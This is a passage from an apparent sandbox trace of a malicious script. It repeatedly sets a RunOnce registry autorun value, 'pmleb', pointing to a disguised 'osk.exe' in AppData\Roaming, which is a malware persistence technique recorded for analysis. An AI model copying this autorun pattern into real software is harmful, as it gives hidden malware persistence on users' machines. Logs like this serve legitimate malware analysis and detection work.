[4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.413] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6 [0077.413] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.414] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5 [0077.414] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.414] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.414] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.414] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.414] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.414] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.415] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.415] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.415] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.415] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.415] RegCloseKey (hKey=0x280) returned 0x0 [0077.415] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.415] GetCurrentThreadId () returned 0x544 [0077.415] GetCurrentThreadId () returned 0x544 [0077.416] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.416] SetTimer (hWnd=0x20280, nIDEvent=0x2005, uElapse=0xa, lpTimerFunc=0x0) returned 0x2005 [0077.416] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.416] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.416] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.416] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.416] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.416] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.416] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0077.416] KillTimer (hWnd=0x302a0, uIDEvent=0x1008) returned 1 [0077.416] GetCurrentThreadId () returned 0x544 [0077.417] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.428] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.428] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.428] KillTimer (hWnd=0x20280, uIDEvent=0x2005) returned 1 [0077.429] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.429] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.429] IUnknown:Release (This=0x787518) returned 0x1 [0077.429] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.429] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.429] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.429] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.430] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.430] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.430] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.430] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.430] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.430] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6 [0077.430] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.430] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7 [0077.430] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.431] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6 [0077.431] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.431] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.431] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.431] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.431] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.431] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.431] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.431] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.432] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.432] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.432] RegCloseKey (hKey=0x280) returned 0x0 [0077.432] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.432] GetCurrentThreadId () returned 0x544 [0077.432] GetCurrentThreadId () returned 0x544 [0077.432] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.432] SetTimer (hWnd=0x20280, nIDEvent=0x2006, uElapse=0xa, lpTimerFunc=0x0) returned 0x2006 [0077.432] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.444] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.444] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.444] KillTimer (hWnd=0x20280, uIDEvent=0x2006) returned 1 [0077.444] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.444] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.444] IUnknown:Release (This=0x787518) returned 0x1 [0077.445] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.445] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.445] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.445] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.445] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.445] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.445] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.445] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.445] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.445] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7 [0077.445] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.445] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x8 [0077.445] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.446] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7 [0077.446] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.446] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.446] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.446] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.447] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.447] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.447] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.447] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.447] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.447] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.447] RegCloseKey (hKey=0x280) returned 0x0 [0077.447] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.447] GetCurrentThreadId () returned 0x544 [0077.447] GetCurrentThreadId () returned 0x544 [0077.448] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.448] SetTimer (hWnd=0x20280, nIDEvent=0x2007, uElapse=0xa, lpTimerFunc=0x0) returned 0x2007 [0077.448] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.459] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.459] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.460] KillTimer (hWnd=0x20280, uIDEvent=0x2007) returned 1 [0077.460] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.460] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.460] IUnknown:Release (This=0x787518) returned 0x1 [0077.460] GetTickCount () returned 0x11499b1 [0077.460] GetCurrentThreadId () returned 0x544 [0077.460] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.460] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.460] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.461] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.461] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.461] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, 